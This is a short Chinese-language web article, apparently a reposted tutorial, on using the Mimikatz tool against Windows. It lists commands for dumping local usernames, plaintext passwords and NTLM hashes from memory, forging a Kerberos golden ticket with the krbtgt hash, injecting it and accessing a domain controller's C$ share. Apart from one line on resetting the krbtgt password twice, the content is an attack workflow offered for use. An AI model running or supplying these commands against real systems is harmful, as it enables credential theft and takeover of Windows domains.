使用mimikatz獲取和創建Windows憑據的工具和方法


Mimikatz


下載地址

https://github.com/gentilkiwi/mimikatz/releases

本地憑據破解


以管理員身份運行(拿到shell提權后)

mimikatz#privilege::debug "測試是否OK,正確的返回應該是Privilege '20' OK"
mimikatz#sekurlsa::logonpasswords "獲取本機用戶名、口令、SID、LM-HASH、NTLM-HASH"
mimikatz#lsadump::lsa /patch "查看相關信息"


黃金憑據生成

#kerberos::golden /user:Administrator /domain:domain-name /sid:user-sid/krbtgt:ntlmhash-value /ticket:test.kirbi

備注

  • user-sid(在lsadump::lsa /patch中獲取到的數據);
  • ntlmhash-value(在lsadump::lsa /patch中獲取到的數據);
  • krbtgt是域控配置域后自動生成的一個賬戶;

利用黃金票據

導入票據: mimikatz:

kerberos::ptt test.kirbi
登陸域控:

net use \\xxxxx.TEST.LOCAL
dir \\xxxxx.TEST.LOCA\c$

黃金憑據的修復方案

修改兩次krbtgt的賬號口令

其他的一些操作

獲取進程信息process::list(還可以imports、exports、start、stop、run、resume、suspend等操作);
獲取服務信息service::list(還可以start、stop、remove等操作);
sekurlsa::wdigest-----獲取本地用戶信息及密碼
sekurlsa::tspkg------獲取tspkg用戶信息及密碼


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM